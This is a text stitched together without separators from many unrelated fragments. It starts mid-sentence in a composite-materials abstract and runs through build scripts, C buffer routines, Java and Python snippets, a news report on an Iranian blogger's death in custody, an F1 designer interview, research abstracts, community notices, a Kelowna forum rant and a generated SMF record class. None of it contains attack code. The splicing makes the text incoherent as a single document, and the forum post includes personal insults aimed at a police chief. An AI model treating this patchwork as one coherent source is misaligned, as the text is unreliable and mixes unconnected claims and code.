matrix. Moreover, it has been observed that with the addition of 30% euphorbia coagulum in the polyester resin further enhanced the mechanical and thermal properties of the composite and decreases the water absorption. The composites developed were found to be eco-friendly and cost effective, can be considered for the multipurpose panel, beam, pedestrian bridge.
import os import fnmatch from os.path import join Import('env names addfiles') # env: the basic env created in the SConstruct # names: list of the names of all files in the # current directory # addfiles: procedure # addfiles(sources, names, pattern) # adds to 'sources' all names in 'names' # that match 'pattern' origEnv = env.Clone() wd = Dir('.').srcnode().path absWd = '#' + wd print 'Scanning ' + wd origEnv.Prepend(CPPPATH = [ '$tclap_include' ]) origEnv.Prepend(CPPPATH = [ '.' ]) if env['UseTICPP']: origEnv.Prepend(CPPPATH = [ '$ticpp_include' ]) origEnv.Prepend(LIBS = [ 'nuklei' ]) ## nuklei ################ env = origEnv.Clone() sources = [ 'nuklei.cpp', env.Glob('util/*.cpp') ] target_name = 'nuklei' target = os.path.join(env['BinDir'], target_name) if env['BuildStaticExecutable']: env.Append(LIBPATH = [ "/usr/lib/atlas-base/atlas" ]) env.Append(LINKFLAGS= [ "-static" ]) product = env.Program(source = sources, target = target) else: product = env.Program(source = sources, target = target) env.Install(dir = '$BinInstallDir', source = product) env.Alias(target_name, [ target ])
<reponame>fabiojna02/OpenCellular /* * cbfstool, CLI utility for CBFS file manipulation * * Copyright 2013 Google Inc. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; version 2 of the License. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ctype.h> #include <unistd.h> #include <stdint.h> #include "common.h" size_t bgets(struct buffer *input, void *output, size_t len) { len = input->size < len ? input->size : len; memmove(output, input->data, len); input->data += len; input->size -= len; return len; } size_t bputs(struct buffer *b, const void *data, size_t len) { memmove(&b->data[b->size], data, len); b->size += len; return len; } /* The assumption in all this code is that we're given a pointer to enough data. * Hence, we do not check for underflow. */ static uint8_t get8(struct buffer *input) { uint8_t ret = *input->data++; input->size--; return ret; } static uint16_t get16be(struct buffer *input) { uint16_t ret; ret = get8(input) << 8; ret |= get8(input); return ret; } static uint32_t get32be(struct buffer *input) { uint32_t ret; ret = get16be(input) << 16; ret |= get16be(input); return ret; } static uint64_t get64be(struct buffer *input) { uint64_t ret; ret = get32be(input); ret <<= 32; ret |= get32be(input); return ret; } static void put8(struct buffer *input, uint8_t val) { input->data[input->size] = val; input->size++; } static void put16be(struct buffer *input, uint16_t val) { put8(input, val >> 8); put8(input, val); } static void put32be(struct buffer *input, uint32_t val) { put16be(input, val >> 16); put16be(input, val); } static void put64be(struct buffer *input, uint64_t val) { put32be(input, val >> 32); put32be(input, val); } static uint16_t get16le(struct buffer *input) { uint16_t ret; ret = get8(input); ret |= get8(input) << 8; return ret; } static uint32_t get32le(struct buffer *input) { uint32_t ret; ret = get16le(input); ret |= get16le(input) << 16; return ret; } static uint64_t get64le(struct buffer *input) { uint64_t ret; uint32_t low; low = get32le(input); ret = get32le(input); ret <<= 32; ret |= low; return ret; } static void put16le(struct buffer *input, uint16_t val) { put8(input, val); put8(input, val >> 8); } static void put32le(struct buffer *input, uint32_t val) { put16le(input, val); put16le(input, val >> 16); } static void put64le(struct buffer *input, uint64_t val) { put32le(input, val); put32le(input, val >> 32); } struct xdr xdr_be = { get8, get16be, get32be, get64be, put8, put16be, put32be, put64be }; struct xdr xdr_le = { get8, get16le, get32le, get64le, put8, put16le, put32le, put64le };
The 2016-17 edition of the University Directory is now available. The PDF, designed to be downloaded and printed, contains an information section, a departmental directory and a faculty/staff directory. The information contained was pulled from the information already available online in the browser-based versions of the departmental and faculty/staff directories. The online directories provide the most up-to-date contact information for UW departments and employees. For this year’s directory, click here.
The family of an Iranian blogger taken into custody accused of opposition activism on Facebook fears that he has died under torture. Police picked up Sattar Beheshti, 35, from his home in the city of Robat-Karim in the southwest of Tehran last week. His relatives said on Wednesday they had received phone calls from the prison authorities asking them to collect Beheshti's dead body from the notorious Kahrizak detention center on Thursday. Beheshti's alleged death cannot be independently confirmed but Baztab, a news website close to Mohsen Rezaei, a senior politician, reported that the blogger has lost his life during interrogations. "Sattar Beheshti, who was arrested by Fata [cyber] police, has died while being interrogated," Baztab reported. Iran is recently reported to have arrested a number of Facebook activists. Although Facebook is blocked in the country, millions of Iranians access it through proxy websites or virtual private networks. Sahamnews, a website close to the opposition leader, Mehdi Karroubi, said Beheshti had died "under torture" during an interrogation session with security officials. "They called us today and asked us to collect his dead body tomorrow from Kahrizak," a family member told Sahamnews. Kahrizak is a detention centre where Iran imprisoned many of the opposition activists caught up in the protests that followed the country's disputed presidential elections in 2009. Before his arrest, Beheshti wrote in his blog: "They threatened me yesterday that my mother would wear black because I don't shut my mouth." Speaking to Masih Alinejad, a UK-based Iranian journalist, Beheshti's sister said: "Last Tuesday they raided into our house and took my brother with them … Today they called my husband and asked him to prepare me and my mother and buy a tomb for his dead body." Commenting on reports about Beheshti's death, the UK's minister for the Middle East and North Africa, Alistair Burt, said: "I am shocked at reports that Sattar Beheshti, a young Iranian citizen, may have died in detention in Iran. Beheshti's only crime appears to be advocating the defence of human rights on the internet. "Tragically, we have seen many similar cases of Iranians being locked up and mistreated in prison for expressing such views. If these reports are true, this is yet another disgraceful attempt by the Iranian government to crush any form of free expression by its citizens. The Iranian authorities have full responsibility for Beheshti's welfare in prison and I call on Iran urgently to confirm what has happened to him." Many protesters are believed to have been tortured to death in Kahrizak, and several claim to have been raped. An Iranian doctor who examined the victims of Kahrizak was shot dead in September 2010. Kahrizak became a scandal for the regime when Mohsen Rouholamini, the son of a former senior adviser to the Revolutionary Guards, was named among prisoners who had died at the centre.
Adrian Newey, Chief technical officer of Red Bull Racing, is rightly held in high regard in the world of Formula 1, regularly described as a genius by his peers. He is the only designer to have won Constructors Championships with three different teams. Eight in total spanning from Williams’ domination of the early 90s, a 1998 McLaren victory and now two back to back titles with Red Bull Racing in 2010 and 2011. His cars have notched well over 100 race wins and 7 driver’s championships. F1 racing has always been a spearhead for innovation in design and technology but more than ever the sport is developing into a mass of computer systems, automated design tools and programmed precision engineering. With each year the sport is moving further from its human roots, the days of drivers such as Graham Hill tinkering in a garage are a distant fantasy. A classic charm envelops designer Newey, which immediately affects the atmosphere of the room where we meet, as he quietly takes a seat within the pressroom of Goodwood House during the 2012 Festival of Speed. Today Adrian Newey is here as a driver, joining his Red Bull colleagues Christian Horner, Sebastian Vettel and Mark Webber in driving the latest Infiniti Hybrid cars up the historical hill climb circuit. Despite his impressive racing driver credentials, his mastery of design and his influences are the subject of our interview, and a subject he still seems boyishly excited to discuss, veiled beneath a calm and analytical thought process behind every answer. The last dinosaur of the pit lane In an age of endless technology Newey’s ideas still flow from a 2B pencil and a single sheet of A4 paper – he calls himself ‘the last dinosaur in the industry.’ “I think more than anything I am a creature of habit, as that is the way I grew up, which was before CAD systems became prevalent,” Newey tells Humans Invent. “But also, what I like about using a drawing board is that I can sketch. CAD systems still haven’t quite made that as easy as pen and paper. Of course, Newey understands and respects the importance of modern technology and research tools in creating race-winning performance, adapting his free-hand design habits to the demands of a modern environment. “Nowadays everything has to go onto a CAD system because you need to test it in CFD (computational fluid dynamics). Everything nowadays is researched and manufactured using computer aided machinery. I have a small team of people who transfer my drawings, scan them and transform them into solid models.” When questioned on the development of the sport, Newey describes how dramatically F1 has changed since he first stepped foot in a garage. “When I started on my first F1 car for Fittipaldi, as a team there was probably 50 people with only 8 engineers. Obviously as teams got bigger, and the industry in general has moved forwards, the tools changed. In those days you only had very basic research tools. Now, there are much bigger research teams who are able to look at things in far more detail – and that changes how you go about the design." “I think the major change is the understanding. If you look back to the 70s, the shape of Formula 1 cars along the grid were all hugely different to each other. A team would come up with a new car for a new season. If the new car wasn’t quicker after a couple of races, they would give up and go back to last season’s car. I’m sure the designer of that car had come up with an idea and thought it to be quicker otherwise he wouldn’t have made the change. And that’s because they didn’t have the research tools to give them a level of understanding to make sure that when they did something, it was going to be a step forwards." “That’s what has changed now, when you come up with ideas you can try to research them much more carefully, so that hopefully the first time it goes on the track it performs how you hope and expect.” Armed with a pad and a pen The transfer of Newey’s freehand sketches to modern design tools is a time consuming process but one that is a necessity for Newey, as his pencil and notepad rarely leave his side. “I think generally it’s just important having your eyes open. The brain’s a strange organ. You see something and think its interesting and then there will be a problem and you will flick away through your sub-conscious for an hour, a day, a week and then an idea will pop up and you go from there.” “I am always fearful that my memory isn’t very good. In fact I know it’s not very good! So I’ll usually make a note of a design on a stickit, or I’ll just draw it there and then. Very often I work on a 24-hour rule. If I still think it is a good idea after 24 hours I will take it further, if not I’ll screw it up and throw it in the bin.” When asked what he aims to achieve when designing F1 cars, Newey quickly shuns any artistic ideals. “For us it is purely performance. I think that’s what makes Formula 1 different to other areas of design. There is no prize for the prettiest car, only the quickest car.” Despite this, one can’t help but feel Newey uses his influences not only for performance but designs which are aesthetically attractive. The constant referencing of aeronautical design by Newey underpins a deep passion for clean lines. He holds a First Class Honours Degree from Southampton University in the subject and when questioned on what he believes to be his favourite design ever, he clearly and confidently says “Concorde” after a mere three-second period of quizzical contemplation. “It’s a beautiful shape and ahead of its time by some way. Both the Russians and the Americans tried to copy it and failed. It flew reliably for all those years and I just think it was so ahead of its time." “I think that period of aeronautical development from the end of the war through to the mid 60s was quite astounding when you consider in 1942 we were in Spitfires, and then by 1962 Blackbird was flying at three times the speed of sound. Literally in 20 years it went from piston-engined fairly rudimental aircraft to something like Blackbird.” Newey would seem a perfect fit for such an era. Arriving to work in a suit, endlessly sketching out designs hunched over his drawing board. A mild manner, air of confidence, a touch of eccentricity and undoubted genius, all harking to a period of maverick British design, allowing him to move in the same circles as historical greats such as Barnes Wallis and R J Mitchell. The tragedy at Imola Designing boundary-pushing racecars has obvious dangers and potential pit falls. In an interview with The Guardian, Newey spoke of the emotional trauma he faced following the death of triple World Champion and racing icon Ayrton Senna while behind the wheel of one of his designs at Imola in 1994. An event, which almost saw the end of his career within the sport. The 12-month period following the accident saw Newey face charges of manslaughter, as well as a personal in-depth examination of whether or not a design fault contributed to the death of Senna. Newey believes after looking at all the data and the crash wreckage that the most realistic cause of the accident was a rear right puncture and not a design fault traced to his person. The undoubted stress placed upon Newey and his fellow Williams colleagues has clearly affected the man, mentally and physically. He believes the ensuing months of stress and turmoil resulted in his now identifiable bald head of hair. This year’s F1 championship, with six world champions all vying for the title, as well as eight different race winners already, has been described as a new golden era of the sport, however the major talking point is about the new Pirelli tyres. “They are very tricky to operate in exactly the right window and what we see every week is some teams getting them to operate in the right window, and others not. That’s the difficult bit to understand.” At Silverstone, Red Bull’s tyre strategy secured a Mark Webber win and a Vettel 3rd place at the 2012 British Grand Prix. The call on tyres ensured Webber was able to pass race leader Fernando Alonso with only 4 laps remaining, to secure yet another career victory for Adrian Newey and one of his cars. Alongside making the right calls, it’s an ominous warning for the rest of the F1 field that once again Newey’s design has delivered a car that is quick and capable of race wins. Just don’t tell him the Red Bull looks pretty. Photo Credits: Silverstone Circuit Ltd, Infiniti Global and Red Bull Racing. Read the full article over at Humans Invent Humans Invent is an online space dedicated to celebrating innovation, craftsmanship and design fueled by our most natural instinct – the pursuit of invention to help solve a human need. You can read their original article here. This week, we're celebrating the many facets of modern design on Gizmodo UK, with a design theme week. Bookmark this page for all related stories, features, interviews and competitions, or contact us here with tips.
package com.edwise.pocs.springboot.controllers; import org.junit.Before; import org.junit.Test; import static org.hamcrest.Matchers.is; import static org.junit.Assert.assertNotNull; import static org.junit.Assert.assertThat; public class HelloWorldControllerTest { private HelloWorldController helloWorldController; @Before public void setUp() { helloWorldController = new HelloWorldController(); } @Test public void testSayHelloWorld() { String msgResult = helloWorldController.sayHelloWorld(); assertNotNull(msgResult); assertThat(msgResult, is("Hello World in your SpringBoot Application!")); } }
version https://git-lfs.github.com/spec/v1 oid sha256:e62f4553962e858e5923d9688b63fb28fb89d4ea1269540b2a3ed9bbb61b2db1 size 826448
Design Optimization Utilizing Dynamic Substructuring and Artificial Intelligence Techniques In mechanical and structural systems, resonance may cause large strains and stresses which can lead to the failure of the system. Since it is often not possible to change the frequency content of the external load excitation, the phenomenon can only be avoided by updating the design of the structure. In this paper, a design optimization strategy based on the integration of the Component Mode Synthesis (CMS) method with numerical optimization techniques is presented. For reasons of numerical efficiency, a Finite Element (FE) model is represented by a surrogate model which is a function of the design parameters. The surrogate model is obtained in four steps: First, the reduced FE models of the components are derived using the CMS method. Then the components are aassembled to obtain the entire structural response. Afterwards the dynamic behavior is determined for a number of design parameter settings. Finally, the surrogate model representing the dynamic behavior is obtained. In this research, the surrogate model is determined using the Backpropagation Neural Networks which is then optimized using the Genetic Algorithms and Sequential Quadratic Programming method. The application of the introduced techniques is demonstrated on a simple test problem.
<filename>PythonCurso01/aula83TryExcept/exemplo01.py # Try/Except # Primeiramente tentará executar o try, caso ocorra alguma exceção ele executará o except. # Algo tão simples é considerado uma má prática. try: # print(ola) pass except: print('Erro')
/** * * @author Carlos Vasquez Polanco */ @Embeddable public class WorkPK implements Serializable { private static final long serialVersionUID = 2003773541626332733L; @Basic(optional = false) @NotNull @Size(min = 1, max = 300) @Column(name = "from_id") private String fromId; @Basic(optional = false) @NotNull @Size(min = 1, max = 300) @Column(name = "work_id") private String workId; public WorkPK() { } public WorkPK(String fromId, String workId) { this.fromId = fromId; this.workId = workId; } public String getFromId() { return fromId; } public void setFromId(String fromId) { this.fromId = fromId; } public String getWorkId() { return workId; } public void setWorkId(String workId) { this.workId = workId; } @Override public int hashCode() { int hash = 0; hash += (fromId != null ? fromId.hashCode() : 0); hash += (workId != null ? workId.hashCode() : 0); return hash; } @Override public boolean equals(Object object) { if (!(object instanceof WorkPK)) { return false; } WorkPK other = (WorkPK) object; if ((this.fromId == null && other.fromId != null) || (this.fromId != null && !this.fromId.equals(other.fromId))) { return false; } return (this.workId != null || other.workId == null) && (this.workId == null || this.workId.equals(other.workId)); } @Override public String toString() { return "WorkPK{" + "fromId=" + fromId + ", workId=" + workId + '}'; } }
Why don't our Kelowna police do this? Penticton at least seems to be TRYING TO DO SOMETHING about their problems. They are trying to police things rather than just giving the druggies, thieves, vandals, destroyers etc a free rein. THERE ARE NO LAWS ANYMORE!!! It's that simple - they can do whatever they want and know it. To me, this is the BIG difference between the majority of our City Council/Police and others....our's say "there's no easy answer", and "we can't arrest our way out of this" while doing nothing but enabling the slide to continue...things of that nature. Ours say "we are doing something, look at Journey Home, all the wet facilities we are building". Others, like Penticton, say things like "let's involve the downtown and brainstorm", "let's increase patrols" etc - they are trying to take a hard stand and DISCOURAGE drug use and crime whereas we openly ENABLE it, thereby ENCOURAGING the continued criminal behaviour. Do we have mini-forums with the police on a regular basis where the police meet with the businesses/residents? Maybe we do and I have just missed all the news articles on it. Funny tho, I work right in the thick of things downtown and haven't seen one letter come to my office advising of any mini-forum, or a brain-storming session with the police, or any council people. Journey Home had some input from the businesses and the business owners were up in arms and took a firm stance and when they were doing that it seemed a few things were put into place to make it better. Soon as they let their foot off the gas on their complaints though the more visible police presence has fallen off again and the vandalism etc has picked right back up. They had put on more patrols which WERE WORKING - could actually SEE cops downtown during the day - and then when things showed signs of improving a bit they slowed them down again - guess what? No cops around and things are taking a turn for the worse again. If those of us against enabling drug use (and thereby encouraging crime) speak up against these seemingly useless methods, we are told we don't know what we are talking about, we are heartless, we are misinformed, there is no easy solution. I agree, there is no easy SOLUTION, but a good start would be bringing back law & order. Journey Home is years away and its success or failure is also years away, yet to be unveiled Our once beautiful City, especially the downtown, will be a cesspool by then. The downtown "vulnerable & marginalized inhabitants" hate their lives so much they destroy others' just for funsies. So, what do we do about it? We build wet houses to enable them to continue on in their hated lives instead of rehabs to give them a chance at a real life. Just look at the destruction done downtown this week? I think I heard a cop caught one in the act of booting in windows.....tell me, what did he do with that guy - the report didn't say. Haul his *bleep* to jail? Extremely Doubtful. Give him a "stern" warning not to do it again and let him go? DOLLARS TO DONUTS. Destruction, costing those affected many dollars to fix knowing it will just happen again and that their police force will do nothing about it - that's the bare bones truth of the matter. I think the druggies and thieves WANT the downtown AND KNOW they are winning...they want to force it into a slum state and drive out the businesses and the majority of City Council/Police are making it real easy for them to do that - a slam dunk. All the residents/tourists of these fancy skyrises Mayor Nose in the Sky & his cheerleaders are approving aren't going to like their surrounds very much once they actually live here but then when those people sound a hullabaloo about it maybe then we will see some law and order. Why would we be building wet facilities to enable them to continue on with their hated lives instead of rehabs? We are wasting our money and putting the rest of the citizenry in their sights to be victims of their drug lifestyle. It should be spent on the rehabs and dry facilities. Wet facilities - to supposedly to keep them alive to make the choice to quit themselves. Except - very very few will ever make that choice - they will either keep on drugging because they can with our help, or they will die before they can make the choice. Meanwhile the rest of the City suffers at their hands either directly or indirectly. I would actually like to see the numbers on the "successes" of wet facilities regarding Kelowna. Anyone who has actually used a wet facility and then made the choice on their own to quit a severe addiction is big news in this fight we are having. That would be a true success story and you'd think they'd be shouting it from the roof-tops with well deserved pride and proving the enabling worked for them - or the facilitators would be crowing about the plan working and see here's proof in the numbers. I'd like to read their stories. All this is MPO. All of you who are typing furiously telling me to shut up unless I have a plan for solving it myself are entitled to yours. My plan is to keep nattering in the hopes the cops (for starters at least) begin enforcing the damn laws that already exist to protect ALL of us, not just the vandals, the thieves, the drug addicts, the destroyers. I hope all of us who feel the same keep putting it out there - maybe someone who feels the same who is in a position of power to do something real about it will take up the cause. dle wrote: Why don't our Kelowna police do this? Penticton at least seems to be TRYING TO DO SOMETHING about their problems. Nope. Just blah blah blah by the head piece of garbage. De Jager blames victims for being victims. He is scum. Be thankful that you don't have this excrement in your town. Oh please don't you too get sucked down that rabbit hole of BS. Colonel Klink here in Penticton is just preaching to the choir. Serious crime like murders,shootings, and violent assaults are not the problem. It is the low level chit.....can't leave a bike in the yard, car window broken and car rifled cuz a loonie was on the console, shop/garage broken into. What do you get? A file number to give to your insurance adjuster so your destructible goes up.
The North Carolina Attorney General’s Office has sent a letter to the U.S. Attorney’s Office for the Eastern District of the state asking them to immediately withdraw their overly broad subpoenas for millions of voters’ information. The State Board voted at a Friday morning meeting to have the Attorney General’s Office work to quash the 45 unprecedented subpoenas for a wide breadth of voter information, including cast ballots. Read more about it here and here, and read the full letter from Zellinger below.
The Minnesota Farm Bureau’s sesquicentennial farm program will honor Minnesota families who have owned their farms for at least 150 years. Since the sesquicentennial farm program began in 2008, more than 225 farms have been recognized. • The farm must be at least 150 years old this year (2019) according to the abstract of title, land patent, original deed, county land records, court file in registration proceedings or other authentic land records. Please do not send originals or copies of records. • The family must have owned the farm for 150 years or more. “Family” is defined as parents, grandparents, aunts, uncles, brothers, sisters, sons, daughters, first cousins and direct in-laws (father, mother, brother, sister, daughter, son-in-law). • Continuous residence on the farm is not required, but ownership must be continuous. • The farm should consist of 50 or more acres and currently be involved in agricultural production. A commemorative certificate signed by Kevin Paap, Minnesota Farm Bureau Federation president, Thom Peterson, Minnesota Department of Agriculture commissioner, and Governor Tim Walz will be awarded to qualifying families, along with an outdoor sign signifying the sesquicentennial farm recognition. Applications are available by writing Sesquicentennial Farms, Minnesota Farm Bureau Federation, P.O. Box 64370, St. Paul, MN, 55164; e-mailing [email protected] or calling (651) 768-2100. Applications are also available online. The deadline for application is March 1. Previously recognized families should not reapply. Century Farms are not automatically recognized as sesquicentennial farms. Families must apply to receive sesquicentennial farm recognition. County Farm Bureaus are encouraged to work with county agriculture societies and county fair boards on local recognition of recipients. Recipients will be announced at the beginning of June. To see a list of previously recognized sesquicentennial farms, visit fbmn.org.
<filename>mylib/__init__.py<gh_stars>1-10 """MyLib""" def hello_world(): print("Hello world")
Registration closes on May 20th. Volunteer details about parking, check in, etc. were sent on Monday, May 21st between 9:00 pm-midnight. Comicpalooza returns to Houston’s George R. Brown Convention Center, May 25-27, 2018. Comicpalooza is the largest multi-format pop culture con in Texas. In addition to the celebrity photos and autograph opportunities, the event features gaming, film festivals, a literary festival, children activities, a Maker’s Space, and lots and lots of cosplay. Are you interested in being part of something big that brings communities of fans together? As one of our volunteers, you will have the chance to see how a convention works from the inside, meet cool people, make new friends, and most notably, know that you have contributed to the entertainment and knowledge of our attendees! Key volunteer information you should know: ALL VOLUNTEER POSITIONS ARE UNPAID. REQUIREMENTS: Volunteers must be at least 18 years of age (by May 18, 2018) in order to participate. Volunteers are REQUIRED to undergo a background check and must sign a participation waiver upon the first shift. (PLEASE FILL OUT YOUR BACKGROUND CHECK WITH VERIFIED VOLUNTEERS. YOU ARE REDIRECTED AFTER YOU REGISTER. DO NOT SKIP THIS STEP.) Each volunteer must sign up for two shifts in order to be considered for the volunteer position. UNIFORM: All volunteers will receive a volunteer shirt. This must be worn at all times while working. Please pair with jeans, khakis, or black pants and sneakers (sandals are not allowed.) Cosplay is not allowed during your shift unless you are an approved member of the Comicpalooza Street Team. PARKING: Parking will be available for volunteers. The precise location of the volunteer parking lot will be communicated at a later date. HOTELS: Hotels are not provided for volunteers. Please Note: You are not able to participate in show events as a spectator while working a volunteer shift. Each position is essential for the success of this event. We will ask volunteers to leave Comicpalooza if they are unable to perform their duties or if any policies are violated. Thank you again for volunteering! For further information or assistance, please contact Monica Whitt at [email protected]
# -*- coding: utf-8 -*- from django.contrib import admin from coffeecups.models import ( Take, TakeForm, Throw, ThrowForm, CupPolicy, CupPolicyForm) class TakeAdmin(admin.ModelAdmin): model = TakeForm list_display = ('user', 'date',) search_fields = ('user__username',) class ThrowAdmin(admin.ModelAdmin): model = ThrowForm list_display = ('user', 'date',) search_fields = ('user__username',) class CupPolicyAdmin(admin.ModelAdmin): model = CupPolicyForm list_display = ( 'name', 'comment', 'no_takes', 'take_of_the_day', 'take_malus', 'throw', ) search_fields = ( 'name', 'comment', 'users__username', 'take_of_the_day', 'take_malus', 'throw', ) admin.site.register(Take, TakeAdmin) admin.site.register(Throw, ThrowAdmin) admin.site.register(CupPolicy, CupPolicyAdmin)
Essentials of Hand Surgery This convenient, portable manual provides all the essential information that surgeons and physicians need, including details on hand anatomy, thorough instructions for physical examination of the hand, and step-by-step guidelines for the diagnosis and treatment of all disorders and injuries. The text is written in an easy-to-follow style and illustrated with 172 drawings, photographs, and radiographs.
A novel approach cryptography by using Residue Number System In this research, we aim to encrypt secret information with high security. In our approach, Residue Number System (RNS) is used to encrypt and Huffman coding and Lempel-Ziv-Welch (LZW) compression algorithm are used to compress information. In the embedding process, Data Encryption Standard (DES) algorithm is used to earn high security.
/** * Base class to map the fixed portion of SMF record 83 (RACF Security information). * This code (excluding these notes) was generated using * <code>com.ibm.jzos.recordgen.asm.RecordClassGenerator</code> using the following JCL: * * <pre><code> //ASSEMBLE EXEC ASMAC,PARM='ADATA,LIST,NOTERM,NODECK,NOOBJECT' //C.SYSIN DD * IFASMFR 83 END //C.SYSADATA DD DSN=&&ADATA,DISP=(NEW,PASS), // SPACE=(CYL,(3,1)) //* //JAVA EXEC PROC=EXJZOSVM,VERSION='50' //MAINARGS DD * com.ibm.jzos.recordgen.asm.RecordClassGenerator section=SMFRCD83 bufoffset=false package=com.ibm.jzos.sample.fields class=Smf83BaseRecord //SYSADATA DD DSN=&&ADATA,DISP=(OLD,DELETE) //STDOUT DD PATH='/home/user/Smf83BaseRecord.java', // PATHOPTS=(OWRONLY,OCREAT), // PATHMODE=SIRWXU //STDENV DD * ... </code></pre> * @see Smf83Record Smf83Record for a hand-coded subclass of this class that glues together the components * of a SMF 83 record * @since 2.1.0 */ public class Smf83BaseRecord { protected static AssemblerDatatypeFactory factory = new AssemblerDatatypeFactory(); /** IFASMFR 83 <br/> *%IFABGN1: ; <br/> * SMF RECORD FIXED HEADER SECTION @D6A <br/> * @D6A <br/> SMFRCD83 DSECT FIXED HEADER SECTION @M5A */ public static int SMFRCD83 = factory.getOffset(); /** DS 0F ALIGN TO FULL WORD BOUNDARY @M5A */ static { factory.pushOffset(); } static { factory.getBinaryAsIntField(4, true); } static { factory.popOffset(); } /** SMF83LEN DS BL2 RECORD LENGTH @M5A */ protected static BinaryAsIntField SMF83LEN = factory.getBinaryAsIntField(2, false); /** SMF83SEG DS BL2 SEGMENT DESCRIPTOR @M5A */ protected static BinaryAsIntField SMF83SEG = factory.getBinaryAsIntField(2, false); /** SMF83FLG DS BL1 SYSTEM INDICATOR @M5A */ protected static BinaryAsIntField SMF83FLG = factory.getBinaryAsIntField(1, false); /** * BIT MEANING WHEN SET @M5A <br/> * BIT 1 SUBTYPE UTILIZED INDICATOR @M5A <br/> SMF83RTY DS BL1 RECORD TYPE(83) @M5A */ protected static BinaryAsIntField SMF83RTY = factory.getBinaryAsIntField(1, false); /** SMF83TME DS BL4 TOD FROM TIME MACRO - BINARY @M5A */ protected static BinaryAsLongField SMF83TME = factory.getBinaryAsLongField(4, false); /** SMF83DTE DS PL4 DATE FROM TIME MACRO @M5A */ protected static PackedDecimalAsIntField SMF83DTE = factory.getPackedDecimalAsIntField(4, true); /** SMF83SID DS CL4 SYSTEM IDENTIFICATION @M5A */ protected static StringField SMF83SID = factory.getStringField(4, true); /** SMF83DF1 DS BL34 THE FOLLOWING FIELDS ARE DIFFERENT FROM @D6C */ protected static ByteArrayField SMF83DF1 = factory.getByteArrayField(34); /** * SMF TYPE 80 RECORD: @M5A <br/> ORG SMF83DF1 @D6C <br/> SMF83SSI DS CL4 SUBSYSTEM IDENTIFICATION - RACF @D6A */ static { factory.incrementOffset(-34); } protected static StringField SMF83SSI = factory.getStringField(4, true); /** SMF83TYP DS BL2 RECORD SUBTYPE =1 @M5A */ protected static BinaryAsIntField SMF83TYP = factory.getBinaryAsIntField(2, false); /** * @D6A <br/> * SELF DEFINING SECTION @D6A <br/> * @D6A <br/> SMF83SDS DS BL28 SELF DEFINING SECTION @D6A */ protected static ByteArrayField SMF83SDS = factory.getByteArrayField(28); /** ORG SMF83SDS @D6A <br/> SMF83TRP DS BL2 NUMBER OF TRIPLETS @D6A */ static { factory.incrementOffset(-28); } protected static BinaryAsIntField SMF83TRP = factory.getBinaryAsIntField(2, false); /** SMF83XXX DS BL2 RESERVED @D6A */ protected static BinaryAsIntField SMF83XXX = factory.getBinaryAsIntField(2, false); /** SMF83OPD DS BL4 OFFSET TO PRODUCT SECTION @D6A */ protected static BinaryAsLongField SMF83OPD = factory.getBinaryAsLongField(4, false); /** SMF83LPD DS BL2 LENGTH OF PRODUCT SECTION @D6A */ protected static BinaryAsIntField SMF83LPD = factory.getBinaryAsIntField(2, false); /** SMF83NPD DS BL2 NUMBER OF PRODUCT SECTIONS @D6A */ protected static BinaryAsIntField SMF83NPD = factory.getBinaryAsIntField(2, false); /** SMF83OD1 DS BL4 OFFSET TO SECURITY SECTION @D6A */ protected static BinaryAsLongField SMF83OD1 = factory.getBinaryAsLongField(4, false); /** SMF83LD1 DS BL2 LENGTH OF SECURITY SECTION @D6A */ protected static BinaryAsIntField SMF83LD1 = factory.getBinaryAsIntField(2, false); /** SMF83ND1 DS BL2 NUMBER OF SECURITY SECTIONS @D6A */ protected static BinaryAsIntField SMF83ND1 = factory.getBinaryAsIntField(2, false); /** SMF83OD2 DS BL4 OFFSET TO RELOCATE SECTION @D6A */ protected static BinaryAsLongField SMF83OD2 = factory.getBinaryAsLongField(4, false); /** SMF83LD2 DS BL2 LENGTH OF RELOCATE SECTION @D6A */ protected static BinaryAsIntField SMF83LD2 = factory.getBinaryAsIntField(2, false); /** SMF83ND2 DS BL2 NUMBER OF RELOCATE SECTIONS @D6A */ protected static BinaryAsIntField SMF83ND2 = factory.getBinaryAsIntField(2, false); protected byte[] bytes; // Instance variables used to cache field values private Integer smf83len; private Integer smf83seg; private Integer smf83flg; private Integer smf83rty; private Long smf83tme; private Integer smf83dte; private String smf83sid; private byte[] smf83df1; private String smf83ssi; private Integer smf83typ; private byte[] smf83sds; private Integer smf83trp; private Integer smf83xxx; private Long smf83opd; private Integer smf83lpd; private Integer smf83npd; private Long smf83od1; private Integer smf83ld1; private Integer smf83nd1; private Long smf83od2; private Integer smf83ld2; private Integer smf83nd2; public Smf83BaseRecord(byte[] buffer) { this.bytes = buffer; } public int getSmf83len() { if (smf83len == null) { smf83len = new Integer(SMF83LEN.getInt(bytes)); } return smf83len.intValue(); } public void setSmf83len(int smf83len) { if (SMF83LEN.equals(this.smf83len, smf83len)) return; SMF83LEN.putInt(smf83len, bytes); this.smf83len = new Integer(smf83len); } public int getSmf83seg() { if (smf83seg == null) { smf83seg = new Integer(SMF83SEG.getInt(bytes)); } return smf83seg.intValue(); } public void setSmf83seg(int smf83seg) { if (SMF83SEG.equals(this.smf83seg, smf83seg)) return; SMF83SEG.putInt(smf83seg, bytes); this.smf83seg = new Integer(smf83seg); } public int getSmf83flg() { if (smf83flg == null) { smf83flg = new Integer(SMF83FLG.getInt(bytes)); } return smf83flg.intValue(); } public void setSmf83flg(int smf83flg) { if (SMF83FLG.equals(this.smf83flg, smf83flg)) return; SMF83FLG.putInt(smf83flg, bytes); this.smf83flg = new Integer(smf83flg); } public int getSmf83rty() { if (smf83rty == null) { smf83rty = new Integer(SMF83RTY.getInt(bytes)); } return smf83rty.intValue(); } public void setSmf83rty(int smf83rty) { if (SMF83RTY.equals(this.smf83rty, smf83rty)) return; SMF83RTY.putInt(smf83rty, bytes); this.smf83rty = new Integer(smf83rty); } public long getSmf83tme() { if (smf83tme == null) { smf83tme = new Long(SMF83TME.getLong(bytes)); } return smf83tme.longValue(); } public void setSmf83tme(long smf83tme) { if (SMF83TME.equals(this.smf83tme, smf83tme)) return; SMF83TME.putLong(smf83tme, bytes); this.smf83tme = new Long(smf83tme); } public int getSmf83dte() { if (smf83dte == null) { smf83dte = new Integer(SMF83DTE.getInt(bytes)); } return smf83dte.intValue(); } 